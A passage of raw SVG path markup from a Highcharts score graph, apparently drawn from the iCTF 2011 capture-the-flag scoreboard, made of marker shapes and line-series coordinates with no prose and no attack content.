204 217 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 219.5 196 L 223.5 200 219.5 204 215.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 218 196 L 222 200 218 204 214 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 216.5 196 L 220.5 200 216.5 204 212.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 215 196 L 219 200 215 204 211 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 213.5 196 L 217.5 200 213.5 204 209.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 211.5 196 L 215.5 200 211.5 204 207.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 210 196 L 214 200 210 204 206 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 208.5 196 L 212.5 200 208.5 204 204.5 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 207 196 L 211 200 207 204 203 200 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 205.5 197 L 209.5 201 205.5 205 201.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 204 197.5 L 208 201.5 204 205.5 200 201.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 202.5 198.5 L 206.5 202.5 202.5 206.5 198.5 202.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 201 200 L 205 204 201 208 197 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 199.5 200 L 203.5 204 199.5 208 195.5 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 198 200 L 202 204 198 208 194 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 196.5 200 L 200.5 204 196.5 208 192.5 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 195 200 L 199 204 195 208 191 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 193.5 200 L 197.5 204 193.5 208 189.5 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 192 200 L 196 204 192 208 188 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 190.5 200 L 194.5 204 190.5 208 186.5 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 189 200 L 193 204 189 208 185 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 187.5 200 L 191.5 204 187.5 208 183.5 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 185.5 200 L 189.5 204 185.5 208 181.5 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 184 200 L 188 204 184 208 180 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 182.5 200 L 186.5 204 182.5 208 178.5 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 181 200 L 185 204 181 208 177 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 179.5 200 L 183.5 204 179.5 208 175.5 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 178 200 L 182 204 178 208 174 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 176.5 200 L 180.5 204 176.5 208 172.5 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 175 200 L 179 204 175 208 171 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 173.5 200 L 177.5 204 173.5 208 169.5 204 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 172 205 L 176 209 172 213 168 209 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 170.5 214.5 L 174.5 218.5 170.5 222.5 166.5 218.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 169 222 L 173 226 169 230 165 226 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 167.5 231.5 L 171.5 235.5 167.5 239.5 163.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 166 231.5 L 170 235.5 166 239.5 162 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 164.5 231.5 L 168.5 235.5 164.5 239.5 160.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 163 231.5 L 167 235.5 163 239.5 159 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 161.5 231.5 L 165.5 235.5 161.5 239.5 157.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 160 231.5 L 164 235.5 160 239.5 156 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 158 231.5 L 162 235.5 158 239.5 154 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 156.5 231.5 L 160.5 235.5 156.5 239.5 152.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 155 231.5 L 159 235.5 155 239.5 151 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 153.5 231.5 L 157.5 235.5 153.5 239.5 149.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 152 231.5 L 156 235.5 152 239.5 148 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 150.5 231.5 L 154.5 235.5 150.5 239.5 146.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 149 231.5 L 153 235.5 149 239.5 145 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 147.5 231.5 L 151.5 235.5 147.5 239.5 143.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 146 231.5 L 150 235.5 146 239.5 142 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 144.5 231.5 L 148.5 235.5 144.5 239.5 140.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 143 231.5 L 147 235.5 143 239.5 139 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 141.5 231.5 L 145.5 235.5 141.5 239.5 137.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 140 231.5 L 144 235.5 140 239.5 136 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 138.5 231.5 L 142.5 235.5 138.5 239.5 134.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 137 231.5 L 141 235.5 137 239.5 133 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 135.5 231.5 L 139.5 235.5 135.5 239.5 131.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 134 231.5 L 138 235.5 134 239.5 130 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 132.5 231.5 L 136.5 235.5 132.5 239.5 128.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 130.5 231.5 L 134.5 235.5 130.5 239.5 126.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 129 231.5 L 133 235.5 129 239.5 125 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 127.5 231.5 L 131.5 235.5 127.5 239.5 123.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 126 231.5 L 130 235.5 126 239.5 122 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 124.5 231.5 L 128.5 235.5 124.5 239.5 120.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 123 231.5 L 127 235.5 123 239.5 119 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 121.5 231.5 L 125.5 235.5 121.5 239.5 117.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 120 231.5 L 124 235.5 120 239.5 116 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 118.5 231.5 L 122.5 235.5 118.5 239.5 114.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 117 231.5 L 121 235.5 117 239.5 113 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 115.5 231.5 L 119.5 235.5 115.5 239.5 111.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 114 231.5 L 118 235.5 114 239.5 110 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 112.5 231.5 L 116.5 235.5 112.5 239.5 108.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 111 231.5 L 115 235.5 111 239.5 107 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 109.5 231.5 L 113.5 235.5 109.5 239.5 105.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 108 231.5 L 112 235.5 108 239.5 104 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 106.5 231.5 L 110.5 235.5 106.5 239.5 102.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 105 231.5 L 109 235.5 105 239.5 101 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 103 231.5 L 107 235.5 103 239.5 99 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 101.5 231.5 L 105.5 235.5 101.5 239.5 97.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 100 231.5 L 104 235.5 100 239.5 96 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 98.5 231.5 L 102.5 235.5 98.5 239.5 94.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 97 231.5 L 101 235.5 97 239.5 93 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 95.5 231.5 L 99.5 235.5 95.5 239.5 91.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 94 231.5 L 98 235.5 94 239.5 90 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 92.5 231.5 L 96.5 235.5 92.5 239.5 88.5 235.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 91 233 L 95 237 91 241 87 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 89.5 233 L 93.5 237 89.5 241 85.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 88 233 L 92 237 88 241 84 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 86.5 233 L 90.5 237 86.5 241 82.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 85 233 L 89 237 85 241 81 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 83.5 233 L 87.5 237 83.5 241 79.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 82 233 L 86 237 82 241 78 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 80.5 233 L 84.5 237 80.5 241 76.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 79 233 L 83 237 79 241 75 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 77.5 233 L 81.5 237 77.5 241 73.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 75.5 233 L 79.5 237 75.5 241 71.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 74 233 L 78 237 74 241 70 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 72.5 233 L 76.5 237 72.5 241 68.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 71 233 L 75 237 71 241 67 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 69.5 233 L 73.5 237 69.5 241 65.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 68 233 L 72 237 68 241 64 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 66.5 233 L 70.5 237 66.5 241 62.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 65 233 L 69 237 65 241 61 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 63.5 233 L 67.5 237 63.5 241 59.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 62 233 L 66 237 62 241 58 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 60.5 233 L 64.5 237 60.5 241 56.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 59 233 L 63 237 59 241 55 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 57.5 233 L 61.5 237 57.5 241 53.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 56 233 L 60 237 56 241 52 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 54.5 233 L 58.5 237 54.5 241 50.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 53 233 L 57 237 53 241 49 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 51.5 233 L 55.5 237 51.5 241 47.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 50 233 L 54 237 50 241 46 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 48 233 L 52 237 48 241 44 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 46.5 233 L 50.5 237 46.5 241 42.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 45 233 L 49 237 45 241 41 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 43.5 233 L 47.5 237 43.5 241 39.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 42 233 L 46 237 42 241 38 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 40.5 233 L 44.5 237 40.5 241 36.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 39 233 L 43 237 39 241 35 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 37.5 233 L 41.5 237 37.5 241 33.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 36 233 L 40 237 36 241 32 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 34.5 233 L 38.5 237 34.5 241 30.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 33 233 L 37 237 33 241 29 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 31.5 233 L 35.5 237 31.5 241 27.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 30 233 L 34 237 30 241 26 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 28.5 233 L 32.5 237 28.5 241 24.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 27 233 L 31 237 27 241 23 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 25.5 233 L 29.5 237 25.5 241 21.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 24 233 L 28 237 24 241 20 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 22 233 L 26 237 22 241 18 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 20.5 233 L 24.5 237 20.5 241 16.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 19 233 L 23 237 19 241 15 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 17.5 233 L 21.5 237 17.5 241 13.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 16 233 L 20 237 16 241 12 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 14.5 233 L 18.5 237 14.5 241 10.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 13 233 L 17 237 13 241 9 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 11.5 233 L 15.5 237 11.5 241 7.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 10 233 L 14 237 10 241 6 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 8.5 233 L 12.5 237 8.5 241 4.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 7 233 L 11 237 7 241 3 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 5.5 233 L 9.5 237 5.5 241 1.5 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 4 233 L 8 237 4 241 0 237 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-1580)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.192608 L 118.51424632352942 236.192608 L 120.04227941176471 236.192608 L 121.5703125 236.192608 L 123.0983455882353 236.192608 L 124.6263786764706 236.192608 L 126.15441176470588 236.192608 L 127.68244485294119 235.82870954666626 L 129.21047794117646 234.65441834666626 L 130.73851102941177 234.65441834666626 L 132.26654411764707 234.65441834666626 L 133.79457720588235 234.65441834666626 L 135.32261029411765 234.65441834666626 L 136.85064338235296 234.65441834666626 L 138.37867647058823 234.65441834666626 L 139.90670955882354 234.65441834666626 L 141.43474264705884 234.65441834666626 L 142.96277573529412 234.65441834666626 L 144.49080882352942 233.79288074666627 L 146.01884191176472 233.79288074666627 L 147.546875 233.79288074666627 L 149.0749080882353 233.79288074666627 L 150.6029411764706 233.79288074666627 L 152.13097426470588 233.79288074666627 L 153.6590073529412 233.79288074666627 L 155.18704044117646 233.79288074666627 L 156.71507352941177 233.79288074666627 L 158.24310661764707 233.79288074666627 L 159.77113970588235 233.79288074666627 L 161.29917279411765 233.79288074666627 L 162.82720588235296 233.79288074666627 L 164.35523897058823 233.79288074666627 L 165.88327205882354 232.36213514666628 L 167.41130514705884 232.36213514666628 L 168.93933823529412 232.36213514666628 L 170.46737132352942 232.36213514666628 L 171.99540441176472 232.36213514666628 L 173.5234375 232.36213514666628 L 175.0514705882353 232.36213514666628 L 176.5795036764706 232.36213514666628 L 178.10753676470588 232.36213514666628 L 179.6355698529412 232.36213514666628 L 181.1636029411765 232.36213514666628 L 182.69163602941177 232.36213514666628 L 184.21966911764707 232.36213514666628 L 185.74770220588235 232.36213514666628 L 187.27573529411765 232.36213514666628 L 188.80376838235296 232.36213514666628 L 190.33180147058823 232.36213514666628 L 191.85983455882354 232.36213514666628 L 193.38786764705884 232.36213514666628 L 194.91590073529412 232.36213514666628 L 196.44393382352942 232.12509834666628 L 197.97196691176472 232.12509834666628 L 199.5 232.12509834666628 L 201.0280330882353 232.12509834666628 L 202.5560661764706 232.12509834666628 L 204.08409926470588 232.12509834666628 L 205.6121323529412 232.12509834666628 L 207.1401654411765 232.12509834666628 L 208.66819852941177 232.12509834666628 L 210.19623161764707 231.96030133333255 L 211.72426470588235 231.96030133333255 L 213.25229779411765 231.96030133333255 L 214.78033088235296 231.96030133333255 L 216.30836397058823 231.96030133333255 L 217.83639705882354 231.96030133333255 L 219.36443014705884 231.96030133333255 L 220.89246323529412 231.96030133333255 L 222.42049632352942 231.96030133333255 L 223.94852941176472 231.29217013333255 L 225.4765625 231.29217013333255 L 227.0045955882353 231.29217013333255 L 228.5326286764706 231.29217013333255 L 230.06066176470588 231.29217013333255 L 231.5886948529412 231.29217013333255 L 233.1167279411765 231.29217013333255 L 234.64476102941177 231.29217013333255 L 236.17279411764707 231.29217013333255 L 237.70082720588238 231.29217013333255 L 239.22886029411765 231.29217013333255 L 240.75689338235296 231.29217013333255 L 242.28492647058823 231.29217013333255 L 243.81295955882354 231.29217013333255 L 245.34099264705884 231.29217013333255 L 246.86902573529412 231.29217013333255 L 248.39705882352942 231.29217013333255 L 249.92509191176472 231.29217013333255 L 251.453125 231.02204053333253 L 252.9811580882353 231.02204053333253 L 254.5091911764706 231.02204053333253 L 256.0372242647059 231.02204053333253 L 257.56525735294116 230.37344533333254 L 259.09329044117646 230.37344533333254 L 260.62132352941177 230.02435477333256 L 262.1493566176471 229.41483157333255 L 263.6773897058824 228.30106645333254 L 265.2054227941177 228.30106645333254 L 266.7334558823529 228.30106645333254 L 268.26148897058823 228.30106645333254 L 269.78952205882354 228.30106645333254 L 271.31755514705884 228.30106645333254 L 272.84558823529414 228.30106645333254 L 274.37362132352945 228.30106645333254 L 275.9016544117647 228.30106645333254 L 277.4296875 228.30106645333254 L 278.9577205882353 228.30106645333254 L 280.4857536764706 228.30106645333254 L 282.0137867647059 228.30106645333254 L 283.54181985294116 228.30106645333254 L 285.06985294117646 228.30106645333254 L 286.59788602941177 228.30106645333254 L 288.1259191176471 228.30106645333254 L 289.6539522058824 228.30106645333254 L 291.1819852941177 228.30106645333254 L 292.7100183823529 227.77359445333252 L 294.23805147058823 225.24279445333252 L 295.76608455882354 225.24279445333252 L 297.29411764705884 225.24279445333252 L 298.82215073529414 225.24279445333252 L 300.35018382352945 225.24279445333252 L 301.8782169117647 225.24279445333252 L 303.40625 225.24279445333252 L 304.9342830882353 225.24279445333252 L 306.4623161764706 224.58247765333255 L 307.9903492647059 223.98665333333253 L 309.51838235294116 223.98665333333253 L 311.04641544117646 223.98665333333253 L 312.57444852941177 223.98665333333253 L 314.1024816176471 223.44000053333255 L 315.6305147058824 221.36137013333254 L 317.1585477941177 217.84489013333254 L 318.6865808823529 215.77719989333252 L 320.21461397058823 215.77719989333252 L 321.74264705882354 211.94388149333253 L 323.27068014705884 211.94388149333253 L 324.79871323529414 211.94388149333253 L 326.32674632352945 211.94388149333253 L 327.8547794117647 210.98739893333254 L 329.3828125 210.98739893333254 L 330.9108455882353 210.98739893333254 L 332.4388786764706 209.79051701333253 L 333.9669117647059 208.71225610666627 L 335.4949448529412 206.47733770666628 L 337.02297794117646 204.56067850666628 L 338.55101102941177 203.49792010666627 L 340.0790441176471 203.49792010666627 L 341.6070772058824 203.49792010666627 L 343.1351102941177 203.49792010666627 L 344.6631433823529 203.49792010666627 L 346.19117647058823 201.6082561066663 L 347.71920955882354 200.60943370666627 L 349.24724264705884 199.62410890666627 L 350.77527573529414 196.54665610666626 L 352.30330882352945 192.5378689066663 L 353.8313419117647 192.5378689066663 L 355.359375 192.5378689066663 L 356.8874080882353 191.85723466666627 L 358.4154411764706 186.67415626666627 L 359.9434742647059 182.24126026666627 L 361.4715073529412 178.77308746666625 L 362.99954044117646 176.15135626666626 L 364.52757352941177 176.15135626666626 L 366.0556066176471 176.15135626666626 L 367.5836397058824 175.48817418666627 L 369.1116727941177 174.0304333866663 L 370.6397058823529 174.0304333866663 L 372.16773897058823 174.0304333866663 L 373.69577205882354 173.3420557866663 L 375.22380514705884 171.92480778666626 L 376.75183823529414 170.85174858666628 L 378.27987132352945 169.07006538666627 L 379.8079044117647 167.19880074666628 L 381.3359375 163.68942474666628 L 382.8639705882353 162.98754954666626 L 384.3920036764706 160.86530058666628 L 385.9200367647059 160.40975658666628 L 387.4480698529412 160.40975658666628 L 388.97610294117646 160.40975658666628 L 390.50413602941177 160.40975658666628 L 392.0321691176471 160.40975658666628 L 393.5602022058824 159.0116893866663 L 395.0882352941177 157.27035690666628" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.192608 L 118.51424632352942 236.192608 L 120.04227941176471 236.192608 L 121.5703125 236.192608 L 123.0983455882353 236.192608 L 124.6263786764706 236.192608 L 126.15441176470588 236.192608 L 127.68244485294119 235.82870954666626 L 129.21047794117646 234.65441834666626 L 130.73851102941177 234.65441834666626 L 132.26654411764707 234.65441834666626 L 133.79457720588235 234.65441834666626 L 135.32261029411765 234.65441834666626 L 136.85064338235296 234.65441834666626 L 138.37867647058823 234.65441834666626 L 139.90670955882354 234.65441834666626 L 141.43474264705884 234.65441834666626 L 142.96277573529412 234.65441834666626 L 144.49080882352942 233.79288074666627 L 146.01884191176472 233.79288074666627 L 147.546875 233.79288074666627 L 149.0749080882353 233.79288074666627 L 150.6029411764706 233.79288074666627 L 152.13097426470588 233.79288074666627 L 153.6590073529412 233.79288074666627 L 155.18704044117646 